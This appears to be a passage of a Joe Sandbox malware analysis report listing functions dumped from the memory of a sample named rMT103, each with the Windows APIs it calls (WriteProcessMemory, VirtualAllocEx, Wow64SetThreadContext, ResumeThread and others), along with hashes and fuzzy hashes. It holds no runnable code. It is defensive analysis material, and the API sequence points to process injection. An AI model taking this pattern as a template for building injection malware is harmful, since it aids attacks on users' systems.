                                                    • Snapshot File: hcaresult_0_2_1390000_rMT103_126021720924.jbxd
                                                    Similarity
                                                    • API ID: Create
                                                    • String ID:
                                                    • API String ID: 2289755597-0
                                                    • Opcode ID: 30eb21abd39948d95def19cec5029dd53097a5e1e93c11ab3a6b30cbfc2c6f46
                                                    • Instruction ID: 3084b8d54dded4981b9d858b4bebd67b7e7839e5f63cbbf37874244294da02d6
                                                    • Opcode Fuzzy Hash: 30eb21abd39948d95def19cec5029dd53097a5e1e93c11ab3a6b30cbfc2c6f46
                                                    • Instruction Fuzzy Hash: 2341F3B0C0071DCFDB25CFAAC844B9DBBB5BF49304F2080AAD409AB255DB756985CF90
                                                    Function 0139592D Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateActCtxA.KERNEL32(?), ref: 013959E9
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1717847206.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_1390000_rMT103_126021720924.jbxd
                                                    Similarity
                                                    • API ID: Create
                                                    • String ID:
                                                    • API String ID: 2289755597-0
                                                    • Opcode ID: 3daf08c4f9c3b560d11a54e1c26a9c574cca765b22c61f6834de522470e602f7
                                                    • Instruction ID: 95ea681784a13d1bc7b448e5da604ada108e2149f166336d4be38601960c5775
                                                    • Opcode Fuzzy Hash: 3daf08c4f9c3b560d11a54e1c26a9c574cca765b22c61f6834de522470e602f7
                                                    • Instruction Fuzzy Hash: 3641F3B0C00719CFDB25CFAAC884BDDBBB5BF49304F2480AAD409AB255DB756985CF90
                                                    Function 058AE7C1 Relevance: 1.6, APIs: 1, Instructions: 72injectionCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 058AE858
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1721309312.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_58a0000_rMT103_126021720924.jbxd
                                                    Similarity
                                                    • API ID: MemoryProcessWrite
                                                    • String ID:
                                                    • API String ID: 3559483778-0
                                                    • Opcode ID: 4335c7a3721c3ca4aef5b565b6bf05bf74bdaadf2e2618b017189363f321997a
                                                    • Instruction ID: 87cc0e1af480302370c3a5e91cf566651bd46dcf61a71b1f6870c168c59cb187
                                                    • Opcode Fuzzy Hash: 4335c7a3721c3ca4aef5b565b6bf05bf74bdaadf2e2618b017189363f321997a
                                                    • Instruction Fuzzy Hash: 31215AB2900359DFDB10DFA9C885BDEBBF5FF48310F10882AE959A7241C774A944CBA5
                                                    Function 058AE7C8 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 058AE858
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1721309312.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_58a0000_rMT103_126021720924.jbxd
                                                    Similarity
                                                    • API ID: MemoryProcessWrite
                                                    • String ID:
                                                    • API String ID: 3559483778-0
                                                    • Opcode ID: 5e549b422b31c987a30999ddd5ecd2556368b23e2b8b9006e056402b562f799e
                                                    • Instruction ID: be5d416cb5c6098e58e6d3c57190ce74ab5e56f7c0f19e322fe352775a8b9069
                                                    • Opcode Fuzzy Hash: 5e549b422b31c987a30999ddd5ecd2556368b23e2b8b9006e056402b562f799e
                                                    • Instruction Fuzzy Hash: 452139B29003599FDB10CFAAC985BDEBBF5FF48310F108829E959A7250C7789944CBA4
                                                    Function 058AE628 Relevance: 1.6, APIs: 1, Instructions: 68threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 058AE6AE
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1721309312.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_58a0000_rMT103_126021720924.jbxd
                                                    Similarity
                                                    • API ID: ContextThreadWow64
                                                    • String ID:
                                                    • API String ID: 983334009-0
                                                    • Opcode ID: c83a9961c742450b5c22a206956b57082fbbd06e8d6a825649e974332775b2d7
                                                    • Instruction ID: ea56d9ad5d4fad5e08fc56a9283ca44b659ff41b70498c58a26b5fed73103d83
                                                    • Opcode Fuzzy Hash: c83a9961c742450b5c22a206956b57082fbbd06e8d6a825649e974332775b2d7
                                                    • Instruction Fuzzy Hash: D72139729003098FDB10DFAAC4857EEFBF4EF88324F108829D559A7241DB78A945CFA5
                                                    Function 058AE8B1 Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 058AE938
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1721309312.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_58a0000_rMT103_126021720924.jbxd
                                                    Similarity
                                                    • API ID: MemoryProcessRead
                                                    • String ID:
                                                    • API String ID: 1726664587-0
                                                    • Opcode ID: 2f9f9f84e317042c5ac2d33a559376cd4073c1f910bd6ff674e9707be16e4743
                                                    • Instruction ID: f8e3a421f6f0ad1636ac0d2cfca33e49cde7003ff4d25fbe7e6af4858870fc76
                                                    • Opcode Fuzzy Hash: 2f9f9f84e317042c5ac2d33a559376cd4073c1f910bd6ff674e9707be16e4743
                                                    • Instruction Fuzzy Hash: 00214AB28003499FDB10DFAAC845AEEFBF5FF48320F508429E959A7250C734A945CBA5
                                                    Function 0139D780 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0139D80F
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1717847206.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_1390000_rMT103_126021720924.jbxd
                                                    Similarity
                                                    • API ID: DuplicateHandle
                                                    • String ID:
                                                    • API String ID: 3793708945-0
                                                    • Opcode ID: fd8198ac020511608bbf5ee7aa28c2f91c34f6781ce7a3b2a6734e4393cefd40
                                                    • Instruction ID: 4fcac0fcac3b266aae5386d3c6c2fb0557a3737453ea7a1208452bfe4be92ad0
                                                    • Opcode Fuzzy Hash: fd8198ac020511608bbf5ee7aa28c2f91c34f6781ce7a3b2a6734e4393cefd40
                                                    • Instruction Fuzzy Hash: 5A2103B5900248DFDB10CF9AD584ADEBFF4FB48320F10842AE918A7310D375A944CFA4
                                                    Function 058AE630 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 058AE6AE
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1721309312.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_58a0000_rMT103_126021720924.jbxd
                                                    Similarity
                                                    • API ID: ContextThreadWow64
                                                    • String ID:
                                                    • API String ID: 983334009-0
                                                    • Opcode ID: 1851c70e7e33983d84860e8b11d1e55709bf5dfd5d3803290eefdbf31cafffb6
                                                    • Instruction ID: 58afdb3fb49881699b8c3c6b46dc870e3eb5a6e060947b0d57d6ceda84d568b9
                                                    • Opcode Fuzzy Hash: 1851c70e7e33983d84860e8b11d1e55709bf5dfd5d3803290eefdbf31cafffb6
                                                    • Instruction Fuzzy Hash: 5F2129B29003098FDB10DFAAC5857EEBBF4EF88324F148829D559A7240DB789945CFA5
                                                    Function 058AE8B8 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 058AE938
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1721309312.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_58a0000_rMT103_126021720924.jbxd
                                                    Similarity
                                                    • API ID: MemoryProcessRead
                                                    • String ID:
                                                    • API String ID: 1726664587-0
                                                    • Opcode ID: e1d594e882f1fdd846748cb962f8b863a60c7c96dc2ca9db88a9a8fa0d8a0296
                                                    • Instruction ID: 44a226a3175a455fa5c574407625a328c829a31d8da8f59e8579ec92ec7238e7
                                                    • Opcode Fuzzy Hash: e1d594e882f1fdd846748cb962f8b863a60c7c96dc2ca9db88a9a8fa0d8a0296
                                                    • Instruction Fuzzy Hash: 122139B28003599FDB10DFAAC841AEEFBF5FF48320F548429E959A7250C7749944CBA4
                                                    Function 0139D788 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0139D80F
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1717847206.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_1390000_rMT103_126021720924.jbxd
                                                    Similarity
                                                    • API ID: DuplicateHandle
                                                    • String ID:
                                                    • API String ID: 3793708945-0
                                                    • Opcode ID: a107f4613697b986a32248ae7786bf7b47cc9e667ef7b757a3e10d110ef1d62d
                                                    • Instruction ID: 3bd83b197b7eb542bb422b51e6f629fa2cfc891fb9b9b4a1a18ae27283cad56c
                                                    • Opcode Fuzzy Hash: a107f4613697b986a32248ae7786bf7b47cc9e667ef7b757a3e10d110ef1d62d
                                                    • Instruction Fuzzy Hash: 0021E4B59002489FDB10CF9AD984ADEBFF4FB48320F14841AE918A7310D374A944CFA4
                                                    Function 058AE700 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 058AE776
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1721309312.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_58a0000_rMT103_126021720924.jbxd
                                                    Similarity
                                                    • API ID: AllocVirtual
                                                    • String ID:
                                                    • API String ID: 4275171209-0
                                                    • Opcode ID: 8cb24d8ae2aa3a0986168c4a9161dae87adb5817ce5242f75514dc78864409cf
                                                    • Instruction ID: a3b92a4a8d6822d42538ee9679517a841b1cbacde5ae9b2e40f4655ec744ed9e
                                                    • Opcode Fuzzy Hash: 8cb24d8ae2aa3a0986168c4a9161dae87adb5817ce5242f75514dc78864409cf
                                                    • Instruction Fuzzy Hash: B8216A72800248CFDB10DFAAC8447DEBFF5EF88320F208819D515A7210C735A554CFA5
                                                    Function 058AE142 Relevance: 1.6, APIs: 1, Instructions: 55threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1721309312.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_58a0000_rMT103_126021720924.jbxd
                                                    Similarity
                                                    • API ID: ResumeThread
                                                    • String ID:
                                                    • API String ID: 947044025-0
                                                    • Opcode ID: dd8a97d9e60015e498bd712b21ba35a775183265262eff763bb8917129bfe7a0
                                                    • Instruction ID: 74d89af1f09dc253fc39f23ee000533a13fd823ab308aa16728a580095b68485
                                                    • Opcode Fuzzy Hash: dd8a97d9e60015e498bd712b21ba35a775183265262eff763bb8917129bfe7a0
                                                    • Instruction Fuzzy Hash: 87115BB29002488FDB20DFAAC5457EEFBF4AB89324F208819D559B7250CA756944CFA4
                                                    Function 058AE708 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 058AE776
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1721309312.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_58a0000_rMT103_126021720924.jbxd
                                                    Similarity
                                                    • API ID: AllocVirtual
                                                    • String ID:
                                                    • API String ID: 4275171209-0
                                                    • Opcode ID: 3bf8b750ac6ca33f40aae4af888b8fab74374d578b958147faaa8b6b09e62b86
                                                    • Instruction ID: 73b92e3f02f7c66201e186f344ac69e6ce247d50b28bd3cd16450feb2c892e87
                                                    • Opcode Fuzzy Hash: 3bf8b750ac6ca33f40aae4af888b8fab74374d578b958147faaa8b6b09e62b86
                                                    • Instruction Fuzzy Hash: 0F1137729002499FDB10DFAAC845BDEBFF5EF88320F208819E559A7250C775A944CFA5
                                                    Function 058AE148 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1721309312.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_58a0000_rMT103_126021720924.jbxd
                                                    Similarity
                                                    • API ID: ResumeThread
                                                    • String ID:
                                                    • API String ID: 947044025-0
                                                    • Opcode ID: b6db07d046e617bf8dc2c6d0d5b8905cb584fc8b6f34e12f2cdee3e77cadb683
                                                    • Instruction ID: 9b17016008c73a20c90c200b1952dff2a447e9fa9bd1d893a04fe4bf67a3f8c9
                                                    • Opcode Fuzzy Hash: b6db07d046e617bf8dc2c6d0d5b8905cb584fc8b6f34e12f2cdee3e77cadb683
                                                    • Instruction Fuzzy Hash: 02113AB19002588FDB20DFAAC4457EEFBF4EB88324F208829D559A7250C775A944CF98
                                                    Function 0139B498 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 0139B4FE
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1717847206.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_1390000_rMT103_126021720924.jbxd
                                                    Similarity
                                                    • API ID: HandleModule
                                                    • String ID:
                                                    • API String ID: 4139908857-0
                                                    • Opcode ID: 3ebf2504959d9f0fe9a5d505d988061d59395d3018fb5635f6cf2be7bafea810
                                                    • Instruction ID: 643f674710a8c25e5392907052b96d5b09199a8468765e591f82b86c0291a477
                                                    • Opcode Fuzzy Hash: 3ebf2504959d9f0fe9a5d505d988061d59395d3018fb5635f6cf2be7bafea810
                                                    • Instruction Fuzzy Hash: 1B1110B6C00249CFDB10CF9AD444ADEFBF4AB88324F10842AD428B7214C375A545CFA5
                                                    Function 07842488 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • PostMessageW.USER32(?,?,?,?), ref: 078424ED
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1722211533.0000000007840000.00000040.00000800.00020000.00000000.sdmp, Offset: 07840000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7840000_rMT103_126021720924.jbxd
                                                    Similarity
                                                    • API ID: MessagePost
                                                    • String ID:
                                                    • API String ID: 410705778-0
                                                    • Opcode ID: 7fcd8d61da3d6952b6d10948fcff14dad486a7bfb8f6a3d9369d25e9a6b3be15
                                                    • Instruction ID: cd31c73d495e75bd14e714500a784fd210a42190bcbba902953415eebfd4712d
                                                    • Opcode Fuzzy Hash: 7fcd8d61da3d6952b6d10948fcff14dad486a7bfb8f6a3d9369d25e9a6b3be15
                                                    • Instruction Fuzzy Hash: 7E1125B58002489FDB10CF9AD845BDEFBF8FB48320F108419E954A7210C374A984CFA5
                                                    Function 07842490 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • PostMessageW.USER32(?,?,?,?), ref: 078424ED
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1722211533.0000000007840000.00000040.00000800.00020000.00000000.sdmp, Offset: 07840000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7840000_rMT103_126021720924.jbxd
                                                    Similarity
                                                    • API ID: MessagePost
                                                    • String ID:
                                                    • API String ID: 410705778-0
                                                    • Opcode ID: e75aef9248b36090be67232a9a1454cbe181ce9ab53c2457f76ab4a39e40a832
                                                    • Instruction ID: 8fae4b8c40d8ecabb0050e21cd5e6f1b4262451e9e7def759ee58c84ddedeac5
                                                    • Opcode Fuzzy Hash: e75aef9248b36090be67232a9a1454cbe181ce9ab53c2457f76ab4a39e40a832
                                                    • Instruction Fuzzy Hash: A111F2B58002499FDB10DF9AC845BDEBBF8EB48320F108419E558A7200C375A584CFA5
                                                    Function 07D3E7B0 Relevance: 1.4, Strings: 1, Instructions: 150COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1722350181.0000000007D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D30000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7d30000_rMT103_126021720924.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: PH^q
                                                    • API String ID: 0-2549759414
                                                    • Opcode ID: 86ee425d21566cd02dbbc5808a95d3c2bfd63f16a1066ce3bf8c7221f842dcf9
                                                    • Instruction ID: bee812403b46f8266e48d94624ed264206d539c91136003126ce640d20de17e3
                                                    • Opcode Fuzzy Hash: 86ee425d21566cd02dbbc5808a95d3c2bfd63f16a1066ce3bf8c7221f842dcf9
                                                    • Instruction Fuzzy Hash: 5E517AB1A00246CFDB18CF25C998B99BBB1EF89714F1581AAE445DB3A5CB35EC44CB60
                                                    Function 07D3E9AC Relevance: 1.4, Strings: 1, Instructions: 101COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1722350181.0000000007D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D30000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7d30000_rMT103_126021720924.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: (bq
                                                    • API String ID: 0-149360118
                                                    • Opcode ID: 2c7d327c225a10a466d0328cdb22fcf55ec4236f7224c926db0fd9989ec1248b
                                                    • Instruction ID: 3d307f00a307ca5a06aa97144e209f72b8f4e462a8c06780e724f05cbbdedf1d
                                                    • Opcode Fuzzy Hash: 2c7d327c225a10a466d0328cdb22fcf55ec4236f7224c926db0fd9989ec1248b
                                                    • Instruction Fuzzy Hash: 6A416F703006118FC765DB38C859B5ABBA6BF85324F158569E06ACB3E1DF74EC8ACB40
                                                    Function 07D354D8 Relevance: 1.3, Strings: 1, Instructions: 37COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1722350181.0000000007D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D30000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7d30000_rMT103_126021720924.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 4'^q
                                                    • API String ID: 0-1614139903
                                                    • Opcode ID: cef34b3d07814f1d3c6339d3fc2e26b29e3f74a6a60f51705ef360de15207e64
                                                    • Instruction ID: c207f913b96de3941657f909e4d1c5f3d9dd41d31d1c4d876f1a18ace95e9bc0
                                                    • Opcode Fuzzy Hash: cef34b3d07814f1d3c6339d3fc2e26b29e3f74a6a60f51705ef360de15207e64
                                                    • Instruction Fuzzy Hash: E8019630A202099FCB05EFB8E94928CBFB0AF44300F5081A8E445DB395EE309A05CB51
                                                    Function 07D354E8 Relevance: 1.3, Strings: 1, Instructions: 32COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1722350181.0000000007D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D30000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7d30000_rMT103_126021720924.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 4'^q
                                                    • API String ID: 0-1614139903
                                                    • Opcode ID: 7faf4360dab9d0536f2c3ec0ab92e4941fd96f6520d0e735196f73fcb215e48b
                                                    • Instruction ID: 00753851f63af96931a9ce299a5f2a8e6909e4b6694aafb788e0c85f79b09fad
                                                    • Opcode Fuzzy Hash: 7faf4360dab9d0536f2c3ec0ab92e4941fd96f6520d0e735196f73fcb215e48b
                                                    • Instruction Fuzzy Hash: BEF0F630A21209DFCB45EFB8F65959CBFB1BB44304B5085A9E405D7394EE305A499B51
                                                    Function 07D3892C Relevance: .2, Instructions: 217COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1722350181.0000000007D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D30000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7d30000_rMT103_126021720924.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: cfb75422f6c55b7d864970a3065c957aeafc9023811aa59d5305b83c3b91918e
                                                    • Instruction ID: d28d7b0121adc74755dff01235e68cdfc93a10a0bccc7ba391d15206866aa9df
                                                    • Opcode Fuzzy Hash: cfb75422f6c55b7d864970a3065c957aeafc9023811aa59d5305b83c3b91918e
                                                    • Instruction Fuzzy Hash: 3BA1B4B4A00205DFDB18DF68D488EA9BBB1FF49315F5581BAE4499B376CB30E885CB50
                                                    Function 07D33528 Relevance: .2, Instructions: 167COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1722350181.0000000007D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D30000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7d30000_rMT103_126021720924.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f59b0ff4ffeb2ba5b207b5e0dd664ca17033429b3f3aa534068f3c275a32f347
                                                    • Instruction ID: 14ea3ea13ffcfeda26eb77667cec0e23e4cb3a22bb5d4782ad877c0a6bb3133d
                                                    • Opcode Fuzzy Hash: f59b0ff4ffeb2ba5b207b5e0dd664ca17033429b3f3aa534068f3c275a32f347
                                                    • Instruction Fuzzy Hash: 1851BCB0B102018FDB15EB68C694BAEBBF6EF89304F104169E40ADB3A1CB75EC45CB50
                                                    Function 07D33518 Relevance: .1, Instructions: 130COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1722350181.0000000007D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D30000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7d30000_rMT103_126021720924.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 9b28180c6a0907f6ddd351cb2ef7b1c7a74bbdee6f5abf142447d0db59d8651e
                                                    • Instruction ID: 6e7461d85aa438c584f358aa1186458e51a8321a65efb9100ac36ad6a44ce143
                                                    • Opcode Fuzzy Hash: 9b28180c6a0907f6ddd351cb2ef7b1c7a74bbdee6f5abf142447d0db59d8651e
                                                    • Instruction Fuzzy Hash: C3419DB0B10202DFDB15EB68C694BAEBBF6AF89304F144169E409DB3A1DB75EC45CB50
                                                    Function 07D3C140 Relevance: .1, Instructions: 117COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1722350181.0000000007D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D30000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7d30000_rMT103_126021720924.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1abd0a4b6dd0287d4aedd89e064e9ba07575792d81cbc7645ebc25e3c82c5990
                                                    • Instruction ID: 4a5dd0c02516ac7f3dbf6147cad55410e92780934f105a0bdd19c120ecc82441
                                                    • Opcode Fuzzy Hash: 1abd0a4b6dd0287d4aedd89e064e9ba07575792d81cbc7645ebc25e3c82c5990
                                                    • Instruction Fuzzy Hash: E1418370710601DFDB249B68C894B6AF3A2FF85310F108629E14A9B3A0CF75EC46DBB1
                                                    Function 07D35DE8 Relevance: .1, Instructions: 116COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1722350181.0000000007D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D30000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7d30000_rMT103_126021720924.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2a9921b3cdb1f56824b62dd2329e2e0e84ca6e313a3b34cbd9fc248358636bc8
                                                    • Instruction ID: e6a1e2df9e583824ca1bc8b0e1b5a367dd8e1c35b6b99a6f067f587cbcebc08b
                                                    • Opcode Fuzzy Hash: 2a9921b3cdb1f56824b62dd2329e2e0e84ca6e313a3b34cbd9fc248358636bc8
                                                    • Instruction Fuzzy Hash: 0F4122B16012019FC725DB38E904BAAF7E1EF84300F048A6ED45BCB390CB79E855CB91
                                                    Function 07D3C130 Relevance: .1, Instructions: 115COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1722350181.0000000007D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D30000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7d30000_rMT103_126021720924.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5bfa14f6378cb63ca88e3f717603b0ed9f7d5f32c72c1f682f003ae6d79e57d1
                                                    • Instruction ID: fb0736ff5732e6cb6bfc659b6a4beb656eed5ce4825a8d6e722dbb7c5ee8a7d2
                                                    • Opcode Fuzzy Hash: 5bfa14f6378cb63ca88e3f717603b0ed9f7d5f32c72c1f682f003ae6d79e57d1
                                                    • Instruction Fuzzy Hash: 5A4181B1310601CFDB25DB64C894B6AF3B2FF85304F148669E14A9B3A1CB75AC46DBB1
                                                    Function 07D38A70 Relevance: .1, Instructions: 106COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1722350181.0000000007D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D30000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7d30000_rMT103_126021720924.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 40d423e2f59419578ab338c123c882115cc1f85aaf53f5b5cd56974e49c8bf2b
                                                    • Instruction ID: b17702a96450d63dfb0e6010de1cdc5bb15a7a0838636cc20b98e1169692f97d
                                                    • Opcode Fuzzy Hash: 40d423e2f59419578ab338c123c882115cc1f85aaf53f5b5cd56974e49c8bf2b
                                                    • Instruction Fuzzy Hash: 0D315AB0310A118FDB15EB38D45962EBBE6FF89211B14466DE01AC73E0EF34E946CB51
                                                    Function 07D38A80 Relevance: .1, Instructions: 102COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1722350181.0000000007D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D30000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7d30000_rMT103_126021720924.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2ee78623717bd371a97b48ee3d2e7329dd4036974b4cca73442e447893c97cb8
                                                    • Instruction ID: f9de42eaad7e5b36596573290f80b4e1562a198e44112604e436f727796782ca
                                                    • Opcode Fuzzy Hash: 2ee78623717bd371a97b48ee3d2e7329dd4036974b4cca73442e447893c97cb8
                                                    • Instruction Fuzzy Hash: F6313AB07106118FDB15AB38D45862EBBE6FF89211B14466DE01ACB3E0EF34E9468B91
                                                    Function 07D3CCE0 Relevance: .1, Instructions: 101COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1722350181.0000000007D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D30000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7d30000_rMT103_126021720924.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
